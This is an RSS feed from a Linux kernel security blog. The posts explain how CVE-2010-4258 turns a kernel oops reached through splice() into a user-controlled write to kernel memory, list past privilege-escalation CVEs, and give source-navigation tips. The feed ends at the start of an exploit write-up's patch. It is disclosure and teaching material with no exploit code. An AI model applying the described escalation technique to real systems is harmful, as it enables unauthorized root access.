<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; kernel</title>
	<atom:link href="http://blog.nelhage.com/tag/kernel/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation exploit for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
			<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation exploit
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>
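
<p>As a rough userspace model of that comparison (not the kernel&#8217;s actual
macro; <code>toy_access_ok</code> and <code>TOY_USER_LIMIT</code> are names made up for this
sketch, and the boundary value is only an example), the check amounts to
something like:</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical boundary: everything below it counts as "userspace". */
#define TOY_USER_LIMIT UINT64_C(0x0000800000000000)

/*
 * Return true if the range [addr, addr + size) lies entirely below `limit`.
 * Written so that addr + size is never computed and so cannot wrap around.
 */
static bool toy_access_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    if (size > limit)
        return false;
    return addr <= limit - size;
}
```

<p>With these assumptions, a small buffer at a low address passes, while
any range that starts in, or runs into, the top part of the address space
is rejected.</p>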

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

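<pre><code>old_fs = get_fs();      /* remember the current limit */
set_fs(KERNEL_DS);      /* allow "user" pointers into kernel memory */
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);         /* restore the normal checks */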
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer. Without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer, so we use
<code>set_fs()</code> to temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, it attempts to clean up, and
then kills the current process by calling the <code>do_exit()</code>
function.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was in before the oops occurred, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>
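
<p>To make the chain concrete, here is a toy userspace model of the pieces
described so far. None of this is kernel code: the <code>toy_</code> names, the
struct layout, and the boundary value are all invented for illustration,
and the &#8220;write&#8221; is reduced to a yes/no answer.</p>

```c
#include <stdbool.h>
#include <stdint.h>

#define TOY_USER_DS   UINT64_C(0x0000800000000000) /* example user/kernel split */
#define TOY_KERNEL_DS UINT64_MAX                   /* effectively "no limit" */

struct toy_task {
    uint64_t addr_limit;       /* the value a set_fs()-style call changes */
    uint64_t clear_child_tid;  /* address chosen by the user, zeroed on exit */
};

/* Model of put_user(): report whether the write would be allowed. */
static bool toy_put_user_allowed(const struct toy_task *t, uint64_t addr)
{
    return addr < t->addr_limit;
}

/* Model of the exit path: true if the zero would actually be written. */
static bool toy_do_exit(const struct toy_task *t)
{
    return toy_put_user_allowed(t, t->clear_child_tid);
}

/* Model of an oops: addr_limit is not reset before the exit path runs. */
static bool toy_oops(const struct toy_task *t)
{
    return toy_do_exit(t);
}
```

<p>In this model, a task whose <code>clear_child_tid</code> points at a kernel address is
harmless while <code>addr_limit</code> is <code>TOY_USER_DS</code>, but the same task oopsing with
<code>addr_limit</code> set to <code>TOY_KERNEL_DS</code> gets its write through.</p>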

<h2><code>splice()</code> et al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. A handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>

<p>As of 2.6.31, an attempt to <code>splice()</code> to or from an fd that doesn&#8217;t
have special support for zero-copy <code>splice</code> will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using <code>set_fs()</code> in order to pass in kernel
buffers.</p>

<p>What that means is that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendmsg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>A brief look at Linux&#8217;s security record</title>
		<link>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/</link>
		<comments>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/#comments</comments>
		<pubDate>Mon, 27 Sep 2010 03:16:19 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=343</guid>
		<description><![CDATA[After the fuss of the last two weeks because of CVE-2010-3081 and CVE-2010-3301, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years. So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like [...]]]></description>
			<content:encoded><![CDATA[<p>After the fuss of the last two weeks because of <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a> and <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3301">CVE-2010-3301</a>, I decided to take a look at a handful of the high-profile privilege escalation vulnerabilities in Linux from the last few years.
</p>

<p>
So, here&#8217;s a summary of the ones I picked out. There are also a large number of smaller ones, like an <a href="http://sota.gen.nz/af_can/"><code>AF&#95;CAN</code></a> exploit, or the <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1084">l2cap</a> overflow in the Bluetooth subsystem, that didn&#8217;t get as much publicity, because they were found more quickly or didn&#8217;t affect as many default configurations.
</p>
<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">
<col align="left"></col><col align="left"></col><col align="right"></col><col align="right"></col><col align="left"></col>
<thead>
<tr><th>CVE name</th><th>Nickname</th><th>Introduced</th><th>Fixed</th><th>Notes</th></tr>
</thead>
<tbody>
<tr><td>CVE-2006-2451</td><td><code>prctl</code></td><td>2.6.13</td><td>2.6.17.4</td><td></td></tr>
<tr><td>CVE-2007-4573</td><td><code>ptrace</code></td><td>2.4.x</td><td>2.6.22.7</td><td>64-bit only</td></tr>
<tr><td>CVE-2008-0009</td><td><code>vmsplice</code> (1)</td><td>2.6.22</td><td>2.6.24.1</td><td></td></tr>
<tr><td>CVE-2008-0600</td><td><code>vmsplice</code> (2)</td><td>2.6.17</td><td>2.6.24.2</td><td></td></tr>
<tr><td>CVE-2009-2692</td><td><code>sock&#95;sendpage</code></td><td>2.4.x</td><td>2.6.31</td><td><code>mmap&#95;min&#95;addr</code> helped <sup><a class="footref" name="fnr.1" href="#fn.1">1</a></sup></td></tr>
<tr><td>CVE-2010-3081</td><td><code>compat&#95;alloc&#95;user&#95;space</code></td><td>2.6.26<sup><a class="footref" name="fnr.2" href="#fn.2">2</a></sup></td><td>2.6.36</td><td></td></tr>
<tr><td>CVE-2010-3301</td><td><code>ptrace</code> (redux)</td><td>2.6.27</td><td>2.6.36</td><td>64-bit only</td></tr>
</tbody>
</table>

<p>
I&#8217;ll probably have some more to say about these bugs in the future, but here are a few thoughts:
</p>

<p><ul>
<li>
At least two of these bugs existed since the 2.4 days. So no matter what kernel you&#8217;ve been running, you had privilege escalation bugs you didn&#8217;t know about for as long as you were running that kernel. We don&#8217;t know whether or not the blackhats knew about them, but are you feeling lucky?
</li>
<li>
I bet there are at least a few more privesc bugs dating back to 2.4 we haven&#8217;t found yet.
</li>
<li>
If you run a Linux machine with untrusted local users, or with services that are at risk of being compromised (e.g. your favorite shitty PHP webapp), you&#8217;d better have a story for how you&#8217;re dealing with these bugs. Including the fact that some of these were privately known for years before they were announced.
</li>
<li>
It&#8217;s not clear from this sample that the kernel is getting more secure over time. I suspect we&#8217;re getting better at finding bugs, particularly now that companies like Google are paying researchers to audit the kernel, but it&#8217;s not obvious we&#8217;re getting better at not introducing them in the first place. Certainly CVE-2010-3301 is pretty embarrassing, being a reintroduction of a bug that had been fixed seven months previously.
</li>
</ul></p>

<div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> <code>mmap_min_addr</code> mitigated this bug to a DoS, but several bugs that allowed attackers to get around that restriction were announced at the same time.
</p>
<p class="footnote"><sup><a class="footnum" name="fn.2" href="#fnr.2">2</a></sup> The public exploit relies on a call path introduced in 2.6.26, but observers have pointed out <a href="http://www.webhostingtalk.com/showpost.php?p=7026467&#038;postcount=192">the possibility</a> of exploit vectors affecting older kernels.
</p>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/09/a-brief-look-at-linuxs-security-record/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Navigating the Linux Kernel</title>
		<link>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/</link>
		<comments>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 01:52:58 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[source-diving]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=291</guid>
		<description><![CDATA[In response to my query last time, ezyang asked for any tips or tricks I have for finding my way around the Linux kernel. I&#8217;m not sure I have much in the way of systematic advice for tracking down the answers to questions about the Linux kernel, but thinking about what I do when posed [...]]]></description>
			<content:encoded><![CDATA[<p>In response to my query last time, <code>ezyang</code> <a href="http://blog.nelhage.com/2010/08/suggestion-time-what-should-i-blog-about/#comment-2597">asked</a> for any
tips or tricks I have for finding my way around the Linux kernel. I&#8217;m
not sure I have much in the way of systematic advice for tracking down
the answers to questions about the Linux kernel, but thinking about
what I do when posed with a patch to Linux that I need to understand, or a
question I need to answer, I&#8217;ve come up with a collection of tips that
will hopefully be helpful to others looking to source-dive Linux for
whatever reason.</p>

<h2>Know the layout</h2>

<p>It sounds basic, but you probably shouldn&#8217;t be doing any serious
source-diving into the Linux kernel without pausing to familiarize
yourself with the basic layout of the kernel sources. The most
interesting directories are:</p>

<ul>
<li><p><code>fs/</code> &#8212; This directory contains both the VFS implementation (the
generic filesystem code and the top-level implementation of
filesystem syscalls), and specific filesystems, in
subdirectories. If you&#8217;re looking for the implementation of a
filesystem-related system call, it&#8217;s probably in one of <code>fs/*.c</code>.</p></li>
<li><p><code>mm/</code> &#8212; This contains the virtual memory and memory management
subsystems. <code>mmap</code> lives here, as do all of the kernel&#8217;s various
memory allocators, including <code>kmalloc</code> and <code>vmalloc</code>.</p></li>
<li><p><code>kernel/</code> &#8212; This contains the &#8220;core&#8221; kernel code. The scheduler
lives here, as does the implementation of various primitives used
throughout the kernel, like <code>printk</code> and various data
structures. Timer- and process-related system calls live here,
including <code>fork</code> and <code>exit</code>, and most anything related to uids and
pids.</p></li>
<li><p><code>net/</code> is the networking subsystem; much like <code>fs/</code> it contains both
generic code and specific network protocol
implementations. Networking-related system calls are mostly in
<code>net/socket.c</code>.</p></li>
<li><p><code>arch/</code> &#8212; Architecture-specific code lives here, in
<code>arch/ARCHITECTURE/</code>. Per-architecture include files live in
<code>arch/ARCHITECTURE/include/asm/</code>; prior to 2.6.28 they were in
<code>include/asm-ARCH/</code>. <code>arch/</code> directories tend to loosely parallel
the top-level source directory, with <code>kernel/</code> and <code>mm/</code>
subdirectories.</p></li>
</ul>

<h2>Know your git</h2>

<p>I find <code>git</code> is one of the most valuable tools at my disposal when
trying to understand the Linux source. There are large classes of
questions about the source that git makes it easy to answer that I
otherwise would have to resort to something much slower or more
cumbersome to figure out. Some things I&#8217;ve found particularly useful
include:</p>

<ul>
<li><p><code>git grep</code> &#8212; <code>git grep</code> works almost identically to <code>grep</code>, but
by default it searches only the files that git tracks in the working
tree, and it can also search the index or any older revision straight
from git&#8217;s object store. Because it knows exactly which files to read,
and ignores files that aren&#8217;t in source control, such as object
files, it&#8217;s typically faster at searching large trees than the
equivalent recursive grep would be.</p></li>
<li><p><code>git blame</code> &#8212; This one should be familiar to anyone who&#8217;s used
subversion or most any other version control system. This will let
you quickly find the commit that introduced a given line. This gives
you several potential sources of information:</p>

<ul>
<li>The commit message often includes helpful documentation on how a
change was supposed to work or what the bug it was fixing was.</li>
<li>The diff is often a quick way to find other files that are related
to the piece of code you&#8217;re looking at, potentially giving you
other places to look for more related code.</li>
</ul></li>
<li><p><code>git log -S</code> &#8212; while <code>git blame</code> can tell you when a specific line
was introduced, <code>git log -S</code>, also known for some inscrutable reason
as the &#8220;pickaxe&#8221;, will let you know when a specific chunk of code
was introduced. Here&#8217;s how it works:</p>

<p>Suppose I wanted to know when the <code>vmsplice</code> system call was
introduced. A <code>git grep</code> will reveal the line in <code>fs/splice.c</code> that
defines the system call:</p>

<pre><code>SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
                unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>I could run <code>git blame</code>, but that points me at commit <code>836f92ad</code>,
which was just one of the commits that introduced the
<code>SYSCALL_DEFINEn</code> wrappers, which isn&#8217;t what I&#8217;m looking for. I
could continue <code>git blame</code>ing from there, but that&#8217;s really not what
I want.</p>

<p>Instead, I can run:</p>

<pre><code>git log -Svmsplice fs/splice.c
</code></pre>

<p>which yields two commits, the earliest of which is the one I want.</p>

<p>So, how does this work? When you use the pickaxe, with <code>-Sstring</code>,
git looks for commits that <em>add</em> or <em>remove</em> an instance of
<strong>string</strong>. It doesn&#8217;t look at the diff or anything &#8212; it simply
counts how often <strong>string</strong> appears before and after the commit, and
includes commits where the numbers are different.</p>

<p>So, <code>836f92ad</code>, which has the hunk:</p>

<pre><code>-asmlinkage long sys_vmsplice(int fd, const struct iovec __user *iov,
-                            unsigned long nr_segs, unsigned int flags)
+SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
+               unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>doesn&#8217;t change the count of <code>vmsplice</code> instances, and isn&#8217;t flagged
by the pickaxe. But the commit that introduced <code>sys_vmsplice</code> in the
first place had to have, and so the pickaxe flags it.</p></li>
</ul>
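
<p>The counting rule behind the pickaxe is simple enough to model in a few
lines. This is only a sketch of the idea as described above, not git&#8217;s
implementation; <code>count_occurrences</code> and <code>pickaxe_flags</code> are hypothetical
helper names, and the &#8220;before&#8221; and &#8220;after&#8221; arguments stand in for the
contents of a file on either side of a commit.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Count non-overlapping occurrences of `needle` in `text`. */
static size_t count_occurrences(const char *text, const char *needle)
{
    size_t n = 0, len = strlen(needle);

    if (len == 0)
        return 0;
    for (const char *p = strstr(text, needle); p; p = strstr(p + len, needle))
        n++;
    return n;
}

/* A commit is flagged when the count differs before and after it. */
static bool pickaxe_flags(const char *before, const char *after,
                          const char *needle)
{
    return count_occurrences(before, needle) != count_occurrences(after, needle);
}
```

<p>Fed the two sides of the <code>836f92ad</code> hunk, <code>pickaxe_flags</code> reports no
change for <code>vmsplice</code>, since the string appears once on each side, but it
does report a change for <code>sys_vmsplice</code>, which only the old side contains.</p>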

<h2>Know your idioms</h2>

<p>One of the advantages of the centrally-controlled model of Linux,
where almost all changes, at least to the core code, are code-reviewed
extensively on the <a href="http://lkml.org/">LKML</a>, is that the code tends to have a very
high standard of stylistic and idiomatic consistency. So once you
learn some of the common idioms of kernel development, you can
recognize them everywhere, and infer information about the structure
of a piece of code without having to go read all of the details.</p>

<p>A corollary that I&#8217;ve found here is: Trust your instincts. If you
think you recognize a pattern in the code, or if there is some way in
which it seems like the code &#8220;ought to be working&#8221;, you&#8217;re usually
well served by assuming that your hunch is right and proceeding based
off of that, and coming back later to check your assumptions if
necessary, instead of stopping at every step to verify your
guesses. Because the code is, in general, of very high quality and
consistency, once you start developing familiarity with it, your
guesses will be right far more often than not.</p>

<p>I won&#8217;t attempt an exhaustive list of design patterns and
idioms in the Linux kernel, but here are some it&#8217;s pretty essential to
be familiar with:</p>

<ul>
<li><p>The <code>_ops</code> struct &#8212; Linux uses an OO-esque style ubiquitously in
the kernel, where structs of function pointers (basically a
poor-man&#8217;s <code>vtable</code>, to you C++ programmers), are passed around and
stored to indicate how to work with some object. These <code>struct</code>s are
known as &#8220;ops&#8221; structures, and typically have types named
<code>FOO_operations</code>, and live in variables named <code>SOMETHING_ops</code>:
<code>struct super_operations</code>, <code>struct inode_operations</code>, <code>struct
file_operations</code>, and so on.</p></li>
<li><p><code>struct list_head</code>, defined in <code>include/linux/types.h</code>, with
operations in <code>include/linux/list.h</code> is used basically anywhere the
kernel needs to store linked lists. To save on space and reduce
fragmentation, the kernel uses a trick where <code>struct list_head</code>s are
stored inside the structures that are the elements of a list, and
pointer arithmetic is used to compute the one from the
other. Familiarize yourself with <code>list.h</code>, since it&#8217;s a rare piece
of code that won&#8217;t use at least some of its functionality.</p></li>
<li><p><code>container_of</code> and related idioms. The trick I mentioned previously,
of storing a <code>list_head</code> inside a structure and using pointer
arithmetic, is generalized in many places, through the
<code>container_of</code> macro.</p>

<p>Let&#8217;s consider the problem of implementing a filesystem, say,
<code>ext2</code>. Linux&#8217;s VFS layer has a generic <code>inode</code> structure that
stores filesystem-independent information about inodes. <code>ext2</code>,
however, has some additional information it needs to store on each
in-memory inode. A standard userspace approach would be for <code>struct
inode</code> to contain a <code>void *userdata</code> pointer, and <code>ext2</code> could
allocate a <code>struct ext2_inode_info</code>, and point <code>userdata</code> at that.</p>

<p>This means that creating an inode needs two allocations, however,
which is inefficient and causes fragmentation in the memory
allocator, which is unacceptable in the kernel.</p>

<p>Instead, ext2 embeds the <code>struct inode</code> <em>inside</em> <code>struct
ext2_inode_info</code>:</p>

<pre><code>/*
 * second extended file system inode data in memory
 */
struct ext2_inode_info {
        __le32  i_data[15];
        …
        struct inode    vfs_inode;
        …
};
</code></pre>

<p>(See <code>fs/ext2/ext2.h</code> for the full definition)</p>

<p>Then, whenever ext2 gets a callback from the VFS with a <code>struct
inode</code>, it can retrieve the <code>ext2_inode_info</code> using:</p>

<pre><code>static inline struct ext2_inode_info *EXT2_I(struct inode *inode)
{
        return container_of(inode, struct ext2_inode_info, vfs_inode);
}
</code></pre>

<p>This uses the <code>container_of</code> macro, which in this case is used to
find the object of type <code>ext2_inode_info</code> which contains the object
<code>inode</code> in the member named <code>vfs_inode</code>. The implementation of this
macro is somewhat hairy and relies on GCC extensions when available,
but you should be able to see that in the end it will compile down
to a simple subtraction &#8212; about as efficient as you could hope for.</p></li>
</ul>
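
<p>The &#8220;ops&#8221; struct and <code>container_of</code> idioms are easy to try out in
userspace. The following is a minimal sketch, assuming a made-up filesystem:
every <code>toy_</code> and <code>toyfs_</code> name is hypothetical, and <code>toy_container_of</code> is a
simplified stand-in for the kernel macro that skips its type checking.</p>

```c
#include <stddef.h>

/* Userspace stand-in for the kernel macro, without the GCC type check. */
#define toy_container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct toy_inode;

/* An "ops" structure: a table of function pointers for one kind of object. */
struct toy_inode_operations {
    long (*get_size)(struct toy_inode *inode);
};

/* The generic, filesystem-independent part. */
struct toy_inode {
    const struct toy_inode_operations *i_op;
};

/* The filesystem-specific part, with the generic inode embedded in it. */
struct toyfs_inode_info {
    long block_count;
    struct toy_inode vfs_inode;
};

/* Recover the enclosing structure from a pointer to the embedded member. */
static struct toyfs_inode_info *TOYFS_I(struct toy_inode *inode)
{
    return toy_container_of(inode, struct toyfs_inode_info, vfs_inode);
}

static long toyfs_get_size(struct toy_inode *inode)
{
    return TOYFS_I(inode)->block_count * 512;
}

static const struct toy_inode_operations toyfs_inode_ops = {
    .get_size = toyfs_get_size,
};

/* Generic code only sees a struct toy_inode and dispatches through i_op. */
static long toy_vfs_size(struct toy_inode *inode)
{
    return inode->i_op->get_size(inode);
}
```

<p>A single <code>struct toyfs_inode_info</code> holds both halves, so one allocation
is enough: generic code is handed <code>&amp;info.vfs_inode</code>, and the
filesystem gets back to <code>info</code> with one subtraction.</p>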

<h2>Know your references</h2>

<p>While source-diving is the ultimate way to answer any question about
the kernel, and is lots of fun to boot, don&#8217;t forget about the
possibility of documentation answering your question, or at least
pointing you in the right direction. Some places that are essential to
look include:</p>

<ul>
<li><p><a href="http://oreilly.com/catalog/9780596005658"><em>Understanding the Linux Kernel</em></a> &#8212; This book is an
incredibly detailed walkthrough of the inner implementation of
virtually every feature and subsystem in the kernel, as of version
2.6.11. It&#8217;s starting to show its age in some places, but it&#8217;s still
largely quite accurate, and is an essential guide to anyone who&#8217;s
serious about, well, understanding the Linux kernel.</p></li>
<li><p><a href="http://lwn.net/">LWN</a> &#8212; LWN (Linux Weekly News) is an excellent publication,
and anyone who hacks on Linux or cares about its development is
well-advised to subscribe. Rarely does a new feature go into Linux
without an incredibly detailed writeup on LWN, including the history
of the feature, details of its development, and a low-level
explanation of how it works and its APIs.</p>

<p>Even without a subscription, old articles are all freely available,
and you&#8217;re well-advised to search LWN&#8217;s <a href="http://lwn.net/Kernel/Index/">kernel index</a>
for anything applicable to your problem.</p></li>
<li><p>The LKML &#8212; The Linux Kernel Mailing List is where almost all the
action happens in the Linux development community. Few features go
in without being hotly debated on this mailing list, and discussions
often lend useful insight into the design and implementation of the
feature in question.</p>

<p>Because patches tend to be submitted to the LKML by email, a good
first step to trying to find discussion on a specific patch is just
to plug its subject (the first line of the commit message) into
Google or your favorite LKML archive&#8217;s search engine.</p></li>
</ul>

<p>Well, this has been quite the braindump. I hope this turns out to be
useful to someone, and please comment if you have other advice or
resources you recommend for getting into the Linux source code.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows. (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in Linus&#8217;s git repository.) Note that this patch was applied to v2.6.22;
these files have since moved around, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

